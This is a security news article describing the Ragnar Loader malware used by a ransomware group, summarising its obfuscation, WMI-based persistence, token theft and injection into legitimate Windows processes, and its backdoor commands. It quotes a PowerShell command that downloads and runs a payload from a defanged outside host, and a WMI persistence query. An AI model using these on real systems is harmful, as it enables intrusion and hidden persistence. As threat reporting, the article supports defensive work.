A sophisticated malware toolkit known as Ragnar Loader has been identified as a critical component in targeted ransomware attacks.
The loader, also known as Sardonic Backdoor, serves as the primary infiltration mechanism for the Monstrous Mantis ransomware group, formerly known as Ragnar Locker, which has been attacking organizations since its emergence in 2020.
Security researchers have determined that Ragnar Loader’s primary function is to establish and maintain persistent access to compromised systems.
.webp)
Once deployed, the malware enables threat actors to maintain long-term footholds within targeted environments, facilitating extended malicious operations.
The toolkit employs multi-layered obfuscation, dynamic decryption routines, and sophisticated persistence mechanisms that pose significant challenges to conventional security defenses.
Catalyst researchers’ analysis reveals that Ragnar Loader utilizes PowerShell-based payloads for execution, incorporating strong encryption and encoding methods including RC4 and Base64 to conceal its operations.
The malware employs process injection strategies to establish stealthy control over compromised systems.
A typical infection begins with PowerShell commands such as: “powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString(‘https://104-238-34-209[.]nip[.]io/4c8b09’)” which downloads and executes the initial payload.
The loader is typically distributed as part of a comprehensive toolkit that includes multiple components: a node initialization script, pivoting files, remote desktop protocol files, and remote code execution scripts.
These tools collectively provide ransomware operators with extensive capabilities for lateral movement and persistence within victim networks.
Evasion Techniques
The malware’s technical sophistication is evident in its multi-stage deployment process.
.webp)
After initial execution, Ragnar Loader decrypts byte arrays by first decompressing them and then applying RC4 decryption.
.webp)
The shellcode exhibits self-modifying behavior through XOR decryption processes.
To establish persistence, the malware creates WMI filters that trigger at specific system uptimes, using queries such as “SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System AND TargetInstance.SystemUpTime >= 140 AND TargetInstance.SystemUpTime < 250.”
This fileless persistence technique helps the malware remain undetected on compromised systems.
.webp)
The loader injects its payload into legitimate Windows processes, particularly WmiPrvSE.exe, after stealing tokens from lsass.exe to elevate privileges.
This technique allows the malware to operate with extended system access while hiding behind legitimate processes.
Once established, the backdoor can receive multiple commands from its command and control server, including functions to load DLL plugins, read and write files, execute shellcode, and create interactive sessions.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
